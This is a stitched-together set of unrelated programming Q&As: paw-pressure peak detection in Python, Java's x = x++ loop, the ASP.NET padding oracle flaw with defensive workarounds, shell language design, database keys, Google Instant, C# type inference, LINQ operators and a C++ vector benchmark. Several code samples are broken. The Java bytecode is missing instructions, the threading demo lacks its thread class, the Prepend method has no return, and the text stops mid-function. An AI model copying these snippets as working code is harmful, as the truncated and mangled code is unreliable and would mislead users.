## Peak detection in a 2D array

I'm helping a veterinary clinic measuring pressure under a dogs paw. I use Python for my data analysis and now I'm stuck trying to divide the paws into (anatomical) subregions.

I made a 2D array of each paw, that consists of the maximal values for each sensor that has been loaded by the paw over time. Here's an example of one paw, where I used Excel to draw the areas I want to 'detect'. These are 2 by 2 boxes around the sensor with local maxima's, that together have the largest sum.

So I tried some experimenting and decide to simply look for the maximums of each column and row (can't look in one direction due to the shape of the paw). This seems to 'detect' the location of the separate toes fairly well, but it also marks neighboring sensors.

So what would be the best way to tell Python which of these maximums are the ones I want?

Note: The 2x2 squares can't overlap, since they have to be separate toes!

Also I took 2x2 as a convenience, any more advanced solution is welcome, but I'm simply a human movement scientist, so I'm neither a real programmer or a mathematician, so please keep it 'simple'.

Edit: Here's a link to my array with the four average paws. I used pickle to write it to the file as was suggested here

## Results

So I tried @jextee's solution (see the results below). As you can see, it works very on the front paws, but it works less well for the hind legs.

More specifically, it can't recognize the small peak that's the fourth toe. This is obviously inherent to the fact that the loop looks top down towards the lowest value, without taking into account where this is.

Would anyone know how to tweak @jextee's algorithm, so that it might be able to find the 4th toe too?

Since I haven't processed any other trials yet, I can't supply any other samples. But the data I gave before were the averages of each paw. This file is an array with the maximal data of 9 paws in the order they made contact with the plate.

This image shows how they were spatially spread out over the plate.

## Update:

I have set up a blog for anyone interested and I have setup a SkyDrive with all the raw measurements. So to anyone requesting more data: more power to you!

## New update:

So after the help I got with my questions regarding paw detection and paw sorting, I was finally able to check the toe detection for every paw! Turns out, it doesn't work so well in anything but paws sized like the one in my own example. Off course in hindsight, it's my own fault for choosing the 2x2 so arbitrarily.

Here's a nice example of where it goes wrong: a nail is being recognized as a toe and the 'heel' is so wide, it gets recognized twice!

The paw is too large, so taking a 2x2 size with no overlap, causes some toes to be detected twice. The other way around, in small dogs it often fails to find a 5th toe, which I suspect is being caused by the 2x2 area being too large.

After trying the current solution on all my measurements I came to the staggering conclusion that for nearly all my small dogs it didn't find a 5th toe and that in over 50% of the impacts for the large dogs it would find more!

So clearly I need to change it. My own guess was changing the size of the `neighborhood` to something smaller for small dogs and larger for large dogs. But `generate_binary_structure` wouldn't let me change the size of the array.

Therefore, I'm hoping that anyone else has a better suggestion for locating the toes, perhaps having the toe area scale with the paw size?

I detected the peaks using a local maximum filter. Here is the result on your first dataset of 4 paws:

I also ran it on the second dataset of 9 paws and it worked as well.

Here is how you do it:

``````import numpy as np
from scipy.ndimage.filters import maximum_filter
from scipy.ndimage.morphology import generate_binary_structure, binary_erosion
import matplotlib.pyplot as pp

#for some reason I had to reshape. Numpy ignored the shape header.

#getting a list of images
paws = [p.squeeze() for p in np.vsplit(paws_data,4)]

def detect_peaks(image):
"""
Takes an image and detect the peaks usingthe local maximum filter.
Returns a boolean mask of the peaks (i.e. 1 when
the pixel's value is the neighborhood maximum, 0 otherwise)
"""

# define an 8-connected neighborhood
neighborhood = generate_binary_structure(2,2)

#apply the local maximum filter; all pixel of maximal value
#in their neighborhood are set to 1
local_max = maximum_filter(image, footprint=neighborhood)==image
#local_max is a mask that contains the peaks we are
#looking for, but also the background.
#In order to isolate the peaks we must remove the background from the mask.

#we create the mask of the background
background = (image==0)

#a little technicality: we must erode the background in order to
#successfully subtract it form local_max, otherwise a line will
#appear along the background border (artifact of the local maximum filter)
eroded_background = binary_erosion(background, structure=neighborhood, border_value=1)

#we obtain the final mask, containing only peaks,
#by removing the background from the local_max mask
detected_peaks = local_max - eroded_background

return detected_peaks

#applying the detection and plotting results
for i, paw in enumerate(paws):
detected_peaks = detect_peaks(paw)
pp.subplot(4,2,(2*i+1))
pp.imshow(paw)
pp.subplot(4,2,(2*i+2) )
pp.imshow(detected_peaks)

pp.show()
``````

All you need to do after is use scipy.ndimage.measurements.label on the mask to label all distinct objects. Then you'll be able to play with them individually.

Note that the method works well because the background is not noisy. If it were, you would detect a bunch of other unwanted peaks in the background. Another important factor is the size of the neighborhood. You will need to adjust it if the peak size changes (the should remain roughly proportional).

## Why does this go into an infinite loop?

I'm a teacher, and yesterday a student wrote the following code:

``````public class Tests {

public static void main(String[] args) throws Exception {
int x = 0;
while(x<3) {
x = x++;
System.out.println(x);
}
}
}
``````

we know he should have writen just `x++` or `x=x+1`, but on `x = x++;` it should first attribute x to itself, and later increment x. Why does x continue with 0 as value?

--update

Here's the bytecode:

``````public class Tests extends java.lang.Object{
public Tests();
Code:
1:   invokespecial   #1; //Method java/lang/Object."<init>":()V
4:   return

public static void main(java.lang.String[])   throws java.lang.Exception;
Code:
0:   iconst_0
1:   istore_1
3:   iconst_3
4:   if_icmpge   22
8:   iinc    1, 1
11:  istore_1
12:  getstatic   #2; //Field java/lang/System.out:Ljava/io/PrintStream;
16:  invokevirtual   #3; //Method java/io/PrintStream.println:(I)V
19:  goto    2
22:  return

}
``````

Perhaps if we write out a method to do the equivalent of what `x++` does it will make this clearer.

(Note: this is C# code for the purpose of illustration. Unless I'm mistaken there's actually no way to pass a parameter by reference in Java.)

``````public static int PostIncrement(ref int x)
{
int valueBeforeIncrement = x;
x = valueBeforeIncrement + 1;
return valueBeforeIncrement;
}
``````

Right? Increment the value passed and return the original value: that's the definition of the postincrement operator.

Now, let's see how this behavior plays out in your example code:

``````int x = 0;
x = PostIncrement(ref x);
``````

`PostIncrement(ref x)` does what? Increments `x`, yes. And then returns what `x` was before the increment. This return value then gets assigned to `x`.

So the order of values assigned to `x` is 0, then 1, then 0.

This might be clearer still if we re-write the above:

``````int x = 0;                       // x is 0.
int temp = PostIncrement(ref x); // Now x is 1, and temp is 0.
x = temp;                        // Now x is 0 again.
``````

Your fixation on the fact that when you replace `x` on the left side of the above assignment with `y`, "you can see that it first increments x, and later attributes it to y" strikes me as confused. It is not `x` that is being assigned to `y`; it is the value formerly assigned to `x`. Really, injecting `y` makes things no different from the scenario above; we've simply got:

``````int x = 0;                       // x is 0.
int y = 0;                       // y is 0.
int temp = PostIncrement(ref x); // Now x is 1, and temp is 0.
y = temp;                        // y is still 0.
``````

So it's clear: `x = x++` effectively does not change the value of x. It always causes x to have the values x0, then x0 + 1, and then x0 again.

Update: Incidentally, lest you doubt that `x` ever gets assigned to 1 "between" the increment operation and the assignment in the example above, I've thrown together a quick demo to illustrate that this intermediate value does indeed "exist," though it will never be "seen" on the executing thread.

The demo calls `x = x++;` in a loop while a separate thread continuously prints the value of `x` to the console.

The code is in Java, but I warn you: I have basically zero experience in Java (I only even answered this question because I felt I could explain what was happening with the `++` operator). So this code might be hideous to a seasoned Java developer.

``````public class Main {
public static volatile int x = 0;

public static void main(String[] args) {
t.start();

while (true) {
x = x++;
}
}
}

public @Override void run() {
while (true) {
System.out.println(Main.x);
}
}
}
``````

Below is an excerpt of the above program's output. Notice the occasional occurrence of 1 amongst a flurry of 0s.

```Starting background thread...
0
0
1
1
0
0
0
0
0
0
0
0
0
0
1
0
1
```

## How serious is this new ASP.NET security vulnerability and how can I workaround it?

I've just read on the net about a newly discovered security vulnerability in ASP.NET. You can read the details here.

The problem lies in the way that ASP.NET implements the AES encryption algorithm to protect the integrity of the cookies these applications generate to store information during user sessions.

This is a bit vague, but here is a more frightening part:

The first stage of the attack takes a few thousand requests, but once it succeeds and the attacker gets the secret keys, it's totally stealthy.The cryptographic knowledge required is very basic.

All in all, I'm not familiar enough with the security/cryptograpy subject to know if this is really that serious.

So, should all ASP.NET developers fear this technique that can own any ASP.NET website in seconds or what?

How does this issue affect the average ASP.NET developer? Does it affect us at all? In real life, what are the consequences of this vulnerability? And, finally: is there some workaround that prevents this vulnerability?

## EDIT: I'd like to summarize the responses I got so far.

So, this is basically a "padding oracle" type of attack. @Sri provided a great explanation about what does this type of attack mean. Here is a shocking video about the issue!

About the seriousness of this vulnerability: Yes, it is indeed serious. It lets the attacker to get to know the machine key of an application. Thus, he can do some very unwanted things.

• In posession of the app's machine key, the attacker can decrypt authentication cookies.
• Even worse than that, he can generate authentication cookies with the name of any user. Thus, he can appear as anyone on the site. The application is unable to differentiate between you or the hacker who generated an authentication cookie with your name for himself.
• It also lets him to decrypt (and also generate) session cookies, although this is not as dangerous as the previous one.
• Not so serious: He can decrypt the encrypted ViewState of pages. (If you use ViewState to store confidental data, you shouldn't do this anyways!)
• Quite unexpected: With the knowledge of the machine key, the attacker can download any arbitrary file from your web application, even those that normally can't be downloaded! (Including Web.Config, etc.)

Here is a bunch of good practices I got that don't solve the issue but help improve the general security of a web application.

Now, let's focus on this issue.

The solution

• Enable customErrors and make a single error page to which all errors are redirected. Yes, even 404s. (ScottGu said that differentiating between 404s and 500s are essential for this attack.) Also, into your `Application_Error` or `Error.aspx` put some code that makes a random delay. (Generate a random number, and use Thread.Sleep to sleep for that long.) This will make it impossible for the attacker to decide what exactly happened on your server.
• Some people recommended switching back to 3DES. In theory, if you don't use AES, you don't encounter the security weakness in the AES implementation. As it turns out, this is not recommended at all.

Some other thoughts

• Seems that not everyone thinks the workaround is good enough.

Thanks to anyone who cared to answer my question. I learned a lot about not only this issue, but web security in general. I marked @Mikael's answer as accepted, but the other answers are also very-very useful.

### What should I do to protect myself?

[Update 2010-09-29]

Microsoft security bulletin

KB Article with reference to the fix

[Update 2010-09-25]

While we are waiting for the fix, yesterday ScottGu postet an update on how to add an extra step to protect your sites with a custom URLScan rule.

Basically make sure you provide a custom error page so that an attacker is not exposed to internal .Net errors, which you always should anyways in release/production mode.

Additionally add a random time sleep in the error page to prevent the attacker from timing the responses for added attack information.

In web.config

``````<configuration>
<location allowOverride="false">
<system.web>
<customErrors mode="On" defaultRedirect="~/error.html" />
</system.web>
</location>
</configuration>
``````

This will redirect any error to a custom page returned with a 200 status code. This way an attacker cannot look at the error code or error information for information needed for further attacks.

It is also safe to set `customErrors mode="RemoteOnly"`, as this will redirect "real" clients. Only browsing from localhost will show internal .Net errors.

The important part is to make sure that all errors are configured to return the same error page. This requires you to explicitly set the `defaultRedirect` attribute on the `<customErrors>` section and ensure that no per-status codes are set.

### What's at stake?

If an attacker manage to use the mentioned exploit, he/she can download internal files from within your web application. Typically web.config is a target and may contain sensitive information like login information in a database connection string, or even link to an automouted sql-express database which you don't want someone to get hold of. But if you are following best practice you use Protected Configuration to encrypt all sensitive data in your web.config.

Read Microsoft's official comment about the vulnerability at http://www.microsoft.com/technet/security/advisory/2416728.mspx. Specifically the "Workaround" part for implementation details on this issue.

Also some information on ScottGu's blog, including a script to find vulnerable ASP.Net apps on your web server.

The attack that Rizzo and Duong have implemented against ASP.NET apps requires that the crypto implementation on the Web site have an oracle that, when sent ciphertext, will not only decrypt the text but give the sender a message about whether the padding in the ciphertext is valid.

If the padding is invalid, the error message that the sender gets will give him some information about the way that the site's decryption process works.

In order for the attack to work the following must be true:

So, if you return human readable error messages in your app like "Something went wrong, please try again" then you should be pretty safe. Reading a bit on the comments on the article also gives valuable information.

• Store a session id in the crypted cookie
• Store the real data in session state (persisted in a db)
• Add a random wait when user information is wrong before returning the error, so you can't time it

That way a hijacked cookie can only be used to retrieve a session which most likely is no longer present or invalidated.

It will be interesting to see what is actually presented at the Ekoparty conference, but right now I'm not too worried about this vulnerability.

## Why are scripting languages (e.g. Perl, Python, Ruby) not suitable as shell languages?

What are the differences between shell languages like bash, zsh, fish and the scripting languages above that makes them more suitable for the shell?

When using the command line the shell languages seem to be much easier. It feels for me much smoother to use bash for example than to use the shell profile in ipython, despite reports to the contrary. I think most wil agree with me that a large portion of medium to large scale programming is easier in Python than in bash. I use Python as the language I am most familiar with, the same goes for Perl and Ruby.

I have tried to articulate the reason but am unable to, aside from assuming that the treatment of strings differently in both has something to do with it.

The reason of this question is that I am hoping to develop a language usable in both. If you know of such a language, please post it as well.

Edit: As S.Lott explains, the question needs some clarification. I am asking about the features of the shell language versus that of scripting languages. So the comparison is not about the characteristics of various interactive (REPL) environments such as history and command line substitution. An alternative expression for the question would be:

Can a programming language that is suitable for design of complex systems be at the same time able to express useful one-liners that can access the file system or control jobs? Can a programming language usefully scale up as well as scale down?

There are a couple of differences that I can think of. (Just thoughtstreaming here, there's no particular order to those.)

1. Python & Co. are designed to be good at scripting. Bash & Co. are designed to be only good at scripting, with absolutely no compromise. IOW: Python is designed to be good both at scripting and non-scripting, Bash cares only about scripting.
2. Bash & Co. are untyped, Python & Co. are strongly typed, which means that the number `123`, the string `123` and the file `123` are quite different. They are, however, not statically typed, which means they need to have different literals for those, in order to keep them apart. Example:

• Ruby: `123` (number), Bash: `123`
• Ruby: `'123'` (string), Bash: `123`
• Ruby: `/123/` (regexp), Bash: `123`
• Ruby: `File.open('123')` (file), Bash: `123`
• Ruby: `IO.open('123')` (file descriptor), Bash: `123`
• Ruby: `URI.parse('123')` (URI), Bash: `123`
• Ruby: ``123`` (command), Bash: `123`
3. Python & Co. are designed to scale up to 10000, 100000, maybe even 1000000 line programs, Bash & Co. are designed to scale down to 10 character programs.

4. In Bash & Co., files, directories, file descriptors, processes are all first-class objects, in Python, only Python objects are first-class, if you want to manipulate files, directories etc., you have to wrap them in a Python object first.
5. Shell programming is basically dataflow programming. Nobody realizes that, not even the people who write shells, but it turns out that shells are quite good at that, and general-purpose languages not so much. In the general-purpose programming world, dataflow seems to be mostly viewed as a concurrency model, not so much as a programming paradigm.

I have the feeling that trying to address these points by bolting features or DSLs onto a general-purpose programming language doesn't work. At least, I have yet to see a convincing implementation of it. There is RuSH (Ruby shell), which tries to implement a shell in Ruby, there is rush, which is an internal DSL for shell programming in Ruby, there is Hotwire, which is a Python shell, but IMO none of those come even close to competing with Bash, Zsh, fish and friends.

Actually, IMHO, the best current shell is Microsoft PowerShell, which is very surprising considering that for several decades now, Microsoft has continually had the worst shells evar. I mean, `COMMAND.COM`? Really? (Unfortunately, they still have a crappy terminal. It's still the "command prompt" that has been around since, what? Windows 3.0?)

PowerShell was basically created by ignoring everything Microsoft has ever done (`COMMAND.COM`, `CMD.EXE`, VBScript, JScript) and instead starting from the Unix shell, then removing all backwards-compatibility cruft (like backticks for command substitution) and massaging it a bit to make it more Windows-friendly (like using the now unused backtick as an escape character instead of the backslash which is the path component separator character in Windows). After that, is when the magic happens.

They address problem 1 and 3 from above, by basically making the opposite choice compared to Python. Python cares about large programs first, scripting second. Bash cares only about scripting. PowerShell cares about scripting first, large programs second. A defining moment for me was watching a video of an interview with Jeffrey Snover (PowerShell's lead designer), when the interviewer asked him how big of a program one could write with PowerShell and Snover answered without missing a beat: "80 characters." At that moment I realized that this is finally a guy at Microsoft who "gets" shell programming (probably related to the fact that PowerShell was neither developed by Microsoft's programming language group (i.e. lambda-calculus math nerds) nor the OS group (kernel nerds) but rather the server group (i.e. sysadmins who actually use shells)), and that I should probably take a serious look at PowerShell.

Number 2 is solved by having arguments be statically typed. So, you can write just `123` and PowerShell knows whether it is a string or a number or a file, because the cmdlet (which is what shell commands are called in PowerShell) declares the types of its arguments to the shell. This has pretty deep ramifications: unlike Unix, where each command is responsible for parsing its own arguments (the shell basically passes the arguments as an array of strings), argument parsing in PowerShell is done by the shell. The cmdlets specify all their options and flags and arguments, as well as their types and names and documentation(!) to the shell, which then can perform argument parsing, tab completion, IntelliSense, inline documentation popups etc. in one centralized place. (This is not revolutionary, and the PowerShell designers acknowledge shells like the DIGITAL Command Language (DCL) and the IBM OS/400 Command Language (CL) as prior art. For anyone who has ever used an AS/400, this should sound familiar. In OS/400, you can write a shell command and if you don't know the syntax of certain arguments, you can simply leave them out and hit F4, which will bring a menu (similar to an HTML form) with labelled fields, dropdown, help texts etc. This is only possible because the OS knows about all the possible arguments and their types.) In the Unix shell, this information is often duplicated three times: in the argument parsing code in the command itself, in the `bash-completion` script for tab-completion and in the manpage.

Number 4 is solved by the fact that PowerShell operates on strongly typed objects, which includes stuff like files, processes, folders and so on.

Number 5 is particularly interesting, because PowerShell is the only shell I know of, where the people who wrote it were actually aware of the fact that shells are essentially dataflow engines and deliberately implemented it as a dataflow engine.

Another nice thing about PowerShell are the naming conventions: all cmdlets are named `Action-Object` and moreover, there are also standardized names for specific actions and specific objects. (Again, this should sound familar to OS/400 users.) For example, everything which is related to receiving some information is called `Get-Foo`. And everything operating on (sub-)objects is called `Bar-ChildItem`. So, the equivalent to `ls` is `Get-ChildItem` (although PowerShell also provides builtin aliases `ls` and `dir` – in fact, whenever it makes sense, they provide both Unix and `CMD.EXE` aliases as well as abbreviations (`gci` in this case)).

But the killer feature IMO is the strongly typed object pipelines. While PowerShell is derived from the Unix shell, there is one very important distinction: in Unix, all communication (both via pipes and redirections as well as via command arguments) is done with untyped, unstructured, ASCII strings. In PowerShell, it's all strongly typed, structured objects. This is so incredibly powerful that I seriously wonder why noone else has thought of it. (Well, they have, but they never became popular.) In my shell scripts, I estimate that up to one third of the commands is only there to act as an adapter between two other commands that don't agree on a common textual format. Many of those adapters go away in PowerShell, because the cmdlets exchange structured objects instead of unstructured text. And if you look inside the commands, then they pretty much consist of three stages: parse the textual input into an internal object representation, manipulate the objects, convert them back into text. Again, the first and third stage basically go away, because the data already comes in as objects.

However, the designers have taken great care to preserve the dynamicity and flexibility of shell scripting through what they call an Adaptive Type System.

Anyway, I don't want to turn this into a PowerShell commercial. There are plenty of things that are not so great about PowerShell, although most of those have to do either with Windows or with the specific implementation, and not so much with the concepts. (E.g. the fact that it is implemented in .NET means that the very first time you start up the shell can take up to several seconds if the .NET framework is not already in the filesystem cache due to some other application that needs it. Considering that you often use the shell for well under a second, that is completely unacceptable.)

The most important point I want to make is that if you want to look at existing work in scripting languages and shells, you shouldn't stop at Unix and the Ruby/Python/Perl/PHP family. For example, Tcl was already mentioned. Rexx would be another scripting language. Emacs Lisp would be yet another. And in the shell realm there are some of the already mentioned mainframe/midrange shells such as the OS/400 command line and DCL. Also, Plan9's rc.

Is email address a bad candidate for primary when compared to auto incrementing numbers. Our web application needs the email address to be unique in the system. So, I thought of using email address as primary key. But, my colleague suggests that string comparison will be slower to integer comparison. Is it a valid reason to not use email ids as primary key.

We are using postgres Thanks

String comparison is slower than int comparison. However, this does not matter if you simply retrieve a user from the database using the e-mail address. It does matter if you have complex queries with multiple joins.

If you store information about users in multiple tables, the foreign keys to the users table will be the e-mail address. That means that you store the e-mail address multiple times.

## How does Google Instant work?

Any ideas on exactly how the new google instant search works? It seems to just be AJAX calls to the old search, but it's pretty hard to simplify Google that much. Anybody have speculations?

EDIT: I know there is AJAX sent with each keypress, but is it predictive? Or do you think it's just a regular ol' google search?

UPDATE: Google have just published a blog article called Google Instant, behind the scenes. It's an interesting read, and obviously related to this question. You can read how they tackled the extra load (5-7X according to the article) on the server-side, for example. The answer below examines what happens on the client-side:

Examining with Firebug, Google is doing an Ajax GET request on every keypress:

I guess it's working the same way as the auto completion. However this time, it also returns the search results of the partially complete search phrase in JSON format.

Examining one of the JSON responses while typing "Stack Overflow":

We can see that the JSON response contains the content to construct the search results as we type.

The formatted JSON responses look something like this:

``````{
e: "j9iHTLXlLNmXOJLQ3cMO",
c: 1,
}/*""*/{
e: "j9iHTLXlLNmXOJLQ3cMO",
c: 1,
}/*""*/{
e: "j9iHTLXlLNmXOJLQ3cMO",
c: 1,
d: "\x3cscript\x3eje.p(_loc,\x27botstuff\x27,\x27 \\x3cdiv id\\x3dbrs style\\x3d\\x22clear:both;margin-bottom:17px;overflow:hidden\\x22\\x3e\\x3cdiv class\\x3d\\x22med\\x22 style\\x3d\\x22text-align:left\\x22\\x3eSearches related to \\x3cem\\x3eStack Overflow\\x3c/em\\x3e\\x3c/div\\x3e\\x3cdiv class\\x3dbrs_col\\x3e\\x3cp\\x3e\\x3ca href\\x3d\\x22/search?hl\\x3den\\x26amp;q\\x3dstack+overflow+error\\x26amp;revid\\x3d-1\\x26amp;sa\\x3dX\\x26amp;ei\\x3dj9iHTLXlLNmXOJLQ3cMO\\x26amp;sqi\\x3d2\\x26amp;ved\\x3d0CEkQ1QIoAA\\x22\\x3estack overflow \\x3cb\\x3eerror\\x3c/b\\x3e\\x3c/a\\x3e\\x3c/p\\x3e\\x3cp\\x3e\\x3ca href\\x3d\\x22/search?hl\\x3den\\x26amp;q\\x3dstack+overflow+internet+explorer\\x26amp;revid\\x3d-1\\x26amp;sa\\x3dX\\x26amp;ei\\x3dj9iHTLXlLNmXOJLQ3cMO\\x26amp;sqi\\x3d2\\x26amp;ved\\x3d0CEoQ1QIoAQ\\x22\\x3estack overflow \\x3cb\\x3einternet explorer\\x3c/b\\x3e\\x3c/a\\x3e\\x3c/p\\x3e\\x3cp\\x3e\\x3ca href\\x3d\\x22/search?hl\\x3den\\x26amp;q\\x3dfix+stack+overflow\\x26amp;revid\\x3d-1\\x26amp;sa\\x3dX\\x26amp;ei\\x3dj9iHTLXlLNmXOJLQ3cMO\\x26amp;sqi\\x3d2\\x26amp;ved\\x3d0CEsQ1QIoAg\\x22\\x3e\\x3cb\\x3efix\\x3c/b\\x3e stack overflow\\x3c/a\\x3e\\x3c/p\\x3e\\x3cp\\x3e\\x3ca href\\x3d\\x22/search?hl\\x3den\\x26amp;q\\x3dstack+overflow+xp\\x26amp;revid\\x3d-1\\x26amp;sa\\x3dX\\x26amp;ei\\x3dj9iHTLXlLNmXOJLQ3cMO\\x26amp;sqi\\x3d2\\x26amp;ved\\x3d0CEwQ1QIoAw\\x22\\x3estack overflow \\x3cb\\x3exp\\x3c/b\\x3e\\x3c/a\\x3e\\x3c/p\\x3e\\x3c/div\\x3e\\x3cdiv class\\x3dbrs_col\\x3e\\x3cp\\x3e\\x3ca href\\x3d\\x22/search?hl\\x3den\\x26amp;q\\x3dstack+overflow+javascript\\x26amp;revid\\x3d-1\\x26amp;sa\\x3dX\\x26amp;ei\\x3dj9iHTLXlLNmXOJLQ3cMO\\x26amp;sqi\\x3d2\\x26amp;ved\\x3d0CE0Q1QIoBA\\x22\\x3estack overflow \\x3cb\\x3ejavascript\\x3c/b\\x3e\\x3c/a\\x3e\\x3c/p\\x3e\\x3cp\\x3e\\x3ca href\\x3d\\x22/search?hl\\x3den\\x26amp;q\\x3dstack+overflow+java\\x26amp;revid\\x3d-1\\x26amp;sa\\x3dX\\x26amp;ei\\x3dj9iHTLXlLNmXOJLQ3cMO\\x26amp;sqi\\x3d2\\x26amp;ved\\x3d0CE4Q1QIoBQ\\x22\\x3estack overflow \\x3cb\\x3ejava\\x3c/b\\x3e\\x3c/a\\x3e\\x3c/p\\x3e\\x3cp\\x3e\\x3ca href\\x3d\\x22/search?hl\\x3den\\x26amp;q\\x3dstack+overflow+c%2B%2B\\x26amp;revid\\x3d-1\\x26amp;sa\\x3dX\\x26amp;ei\\x3dj9iHTLXlLNmXOJLQ3cMO\\x26amp;sqi\\x3d2\\x26amp;ved\\x3d0CE8Q1QIoBg\\x22\\x3estack overflow \\x3cb\\x3ec++\\x3c/b\\x3e\\x3c/a\\x3e\\x3c/p\\x3e\\x3cp\\x3e\\x3ca href\\x3d\\x22/search?hl\\x3den\\x26amp;q\\x3dstack+overflow+windows+xp\\x26amp;revid\\x3d-1\\x26amp;sa\\x3dX\\x26amp;ei\\x3dj9iHTLXlLNmXOJLQ3cMO\\x26amp;sqi\\x3d2\\x26amp;ved\\x3d0CFAQ1QIoBw\\x22\\x3estack overflow \\x3cb\\x3ewindows xp\\x3c/b\\x3e\\x3c/a\\x3e\\x3c/p\\x3e\\x3c/div\\x3e\\x3c/div\\x3e \x27,_ss);/*  */\x3c/script\x3e"
}/*""*/
``````

## Problem understanding C# type inference as described in the language specification

The C# language specification describes type inference in Section §7.5.2. There is a detail in it that I don’t understand. Consider the following case:

``````// declaration
void Method<T>(T obj, Func<string, T> func);

// call
Method("obj", s => (object) s);
``````

Both the Microsoft and Mono C# compilers correctly infer `T` = `object`, but my understanding of the algorithm in the specification would yield `T` = `string` and then fail. Here is how I understand it:

The first phase

• If Ei is an anonymous function, an explicit parameter type inference (§7.5.2.7) is made from Ei to Ti

⇒ has no effect, because the lambda expression has no explicit parameter types. Right?

• Otherwise, if Ei has a type U and xi is a value parameter then a lower-bound inference is made from U to Ti.

⇒ the first parameter is of static type `string`, so this adds `string` to the lower bounds for `T`, right?

The second phase

• All unfixed type variables Xi which do not depend on (§7.5.2.5) any Xj are fixed (§7.5.2.10).

`T` is unfixed; `T` doesn’t depend on anything... so `T` should be fixed, right?

§7.5.2.11 Fixing

• The set of candidate types Uj starts out as the set of all types in the set of bounds for Xi.

⇒ { `string` (lower bound) }

• We then examine each bound for Xi in turn: [...] For each lower bound U of Xi all types Uj to which there is not an implicit conversion from U are removed from the candidate set. [...]

⇒ doesn’t remove anything from the candidate set, right?

• If among the remaining candidate types Uj there is a unique type V from which there is an implicit conversion to all the other candidate types, then Xi is fixed to V.

⇒ Since there is only one candidate type, this is vacuously true, so Xi is fixed to `string`. Right?

So where am I going wrong?

UPDATE: My initial investigation on the bus this morning was incomplete and wrong. The text of the first phase specification is correct. The implementation is correct.

The spec is wrong in that it gets the order of events wrong in the second phase. We should be specifying that we make output type inferences before we fix the non-dependent parameters.

Man, this stuff is complicated. I have rewritten this section of the spec more times than I can remember.

I have seen this problem before, and I distinctly recall making revisions such that the incorrect term "type variable" was replaced everywhere with "type parameter". (Type parameters are not storage locations whose contents can vary, so it makes no sense to call them variables.) I think at the same time I noted that the ordering was wrong. Probably what happened was we accidentally shipped an older version of the spec on the web. Many apologies.

I will work with Mads to get the spec updated to match the implementation. I think the correct wording of the second phase should go something like this:

• If no unfixed type parameters exist then type inference succeeds.
• Otherwise, if there exists one or more arguments Ei with corresponding parameter type Ti such that the output type of Ei with type Ti contains at least one unfixed type parameter Xj, and none of the input types of Ei with type Ti contains any unfixed type parameter Xj, then an output type inference is made from all such Ei to Ti.

Whether or not the previous step actually made an inference, we must now fix at least one type parameter, as follows:

• If there exists one or more type parameters Xi such that Xi is unfixed, and Xi has a non-empty set of bounds, and Xi does not depend on any Xj then each such Xi is fixed. If any fixing operation fails then type inference fails.
• Otherwise, if there exists one or more type parameters Xi such that Xi is unfixed, and Xi has a non-empty set of bounds, and there is at least one type parameter Xj that depends on Xi then each such Xi is fixed. If any fixing operation fails then type inference fails.
• Otherwise, we are unable to make progress and there are unfixed parameters. Type inference fails.

If type inference neither fails nor succeeds then the second phase is repeated.

The idea here is that we want to ensure that the algorithm never goes into an infinite loop. At every repetition of the second phase it either succeeds, fails, or makes progress. It cannot possibly loop more times than there are type parameters to fix to types.

Thanks for bringing this to my attention.

## What's your favorite LINQ to Objects operator which is not built-in?

With extension methods, we can write handy LINQ operators which solve generic problems.

I want to hear which methods or overloads you are missing in the `System.Linq` namespace and how you implemented them.

Clean and elegant implementations, maybe using existing methods, are preferred.

## Append & Prepend

``````/// <summary>Adds a single element to the end of an IEnumerable.</summary>
/// <typeparam name="T">Type of enumerable to return.</typeparam>
/// <returns>IEnumerable containing all the input elements, followed by the
public static IEnumerable<T> Append<T>(this IEnumerable<T> source, T element)
{
if (source == null)
throw new ArgumentNullException("source");
return concatIterator(element, source, false);
}

/// <summary>Adds a single element to the start of an IEnumerable.</summary>
/// <typeparam name="T">Type of enumerable to return.</typeparam>
/// <returns>IEnumerable containing the specified additional element, followed by
/// all the input elements.</returns>
public static IEnumerable<T> Prepend<T>(this IEnumerable<T> tail, T head)
{
if (tail == null)
throw new ArgumentNullException("tail");
}

private static IEnumerable<T> concatIterator<T>(T extraElement,
IEnumerable<T> source, bool insertAtStart)
{
if (insertAtStart)
yield return extraElement;
foreach (var e in source)
yield return e;
if (!insertAtStart)
yield return extraElement;
}
``````

## Can select * usage ever be justified?

I've always preached to my developers that `SELECT *` is evil and should be avoided like the plague.

Are there any cases where it can be justified?

I'm not talking about `COUNT(*)` - which most optimizers can figure out.

Edit

And one great example I saw of this bad practice was a legacy asp application that used `select *` in a stored procedure, and used `ADO` to loop through the returned records, but got the columns by index. You can imagine what happened when a new field was added somewhere other than the end of the field list.

I'm quite happy using `*` in audit triggers.

In that case it can actually prove a benefit because it will ensure that if additional columns are added to the base table it will raise an error so it cannot be forgotten to deal with this in the audit trigger and/or audit table structure.

## Is it OK to try/catch something just to check if an exception was thrown or not ?

Is it a good way to try something useless just to see if a particular exception is thrown by this code ?
I want to do something when the exception is thrown, and nothing otherwise.

``````try {
new BigDecimal("some string"); // This do nothing because the instance is ignored
} catch (NumberFormatException e) {
return false; // OK, the string wasn't a well-formed decimal
}
return true;
``````

There is too many preconditions to test, and the constructor BigDecimal() is always checking them all, so this seem the simplest method.

Generally, this practice should be avoided. But since there is no utility method `isValidBigDecimal(..)`, that's the way to go.

As Peter Tillemans noted in the comments, place this code in a utility method called `isValidBigDecimal(..)`. Thus your code will be agnostic of the way of determining the validity, and you can even later switch to another method.

## std::vector is so much slower than plain arrays?

I've always thought it's the general wisdom that `std::vector` is "implemented as an array," blah blah blah. Today I went down and tested it, seems to be not so:

Here's some test results:

``````UseArray completed in 2.619 seconds
UseVector completed in 9.284 seconds
UseVectorPushBack completed in 14.669 seconds
The whole thing completed in 26.591 seconds
``````

That's about 3 - 4 times slower! Doesn't really justify for the "`vector` may be slower for a few nanosecs" comments.

And the code I used:

``````#include <cstdlib>
#include <vector>

#include <iostream>
#include <string>

#include <boost/date_time/posix_time/ptime.hpp>
#include <boost/date_time/microsec_time_clock.hpp>

class TestTimer
{
public:
TestTimer(const std::string & name) : name(name),
start(boost::date_time::microsec_clock<boost::posix_time::ptime>::local_time())
{
}

~TestTimer()
{
using namespace std;
using namespace boost;

posix_time::ptime now(date_time::microsec_clock<posix_time::ptime>::local_time());
posix_time::time_duration d = now - start;

cout << name << " completed in " << d.total_milliseconds() / 1000.0 <<
" seconds" << endl;
}

private:
std::string name;
boost::posix_time::ptime start;
};

struct Pixel
{
Pixel()
{
}

Pixel(unsigned char r, unsigned char g, unsigned char b) : r(r), g(g), b(b)
{
}

unsigned char r, g, b;
};

void UseVector()
{
TestTimer t("UseVector");

